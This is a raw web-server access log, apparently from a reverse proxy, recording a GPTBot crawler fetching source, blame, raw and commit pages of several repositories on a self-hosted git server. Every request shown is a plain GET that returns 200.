"/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12" +[17/Feb/2026:15:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png" +[17/Feb/2026:15:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9956] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:15:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9913] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:15:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9993] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:15:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:15:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 10282] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include" +[17/Feb/2026:15:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2finclude" [Client 74.7.227.38] [Length 29169] [Gzip 6.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include" +[17/Feb/2026:15:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 15737] [Gzip 5.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:15:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 22398] [Gzip 11.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:15:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9923] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site" +[17/Feb/2026:15:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2finclude%2fsite" [Client 74.7.227.38] [Length 29193] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site" +[17/Feb/2026:15:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9935] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12" +[17/Feb/2026:15:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 16] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:15:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:15:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:15:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 16] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:15:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 9901] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include" +[17/Feb/2026:15:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 22430] [Gzip 11.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:15:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 9936] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:15:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 17224] [Gzip 9.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:15:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9894] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site" +[17/Feb/2026:15:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 4755] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:15:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png" +[17/Feb/2026:15:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png" +[17/Feb/2026:15:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png" +[17/Feb/2026:15:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10861] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png" +[17/Feb/2026:15:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 9909] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:15:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 9909] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:15:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 9909] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:15:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 10143] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:15:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 9909] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:15:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 10143] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:15:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf?display=source" [Client 74.7.227.38] [Length 11673] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf" +[17/Feb/2026:15:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf" +[17/Feb/2026:15:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10890] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" +[17/Feb/2026:15:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fEXE-00.toc" [Client 74.7.227.38] [Length 27178] [Gzip 8.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:15:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fPYZ-00.toc" [Client 74.7.227.38] [Length 41264] [Gzip 16.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:15:46:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fEXE-00.toc" [Client 74.7.227.38] [Length 18650] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:15:46:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fPKG-00.toc" [Client 74.7.227.38] [Length 24545] [Gzip 7.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:15:46:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11599] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:46:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11599] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:46:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10316] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:46:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10316] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11598] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10309] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 24948] [Gzip 10.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" +[17/Feb/2026:15:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 98386] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:15:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 122519] [Gzip 13.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" +[17/Feb/2026:15:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 15925] [Gzip 7.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" +[17/Feb/2026:15:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr 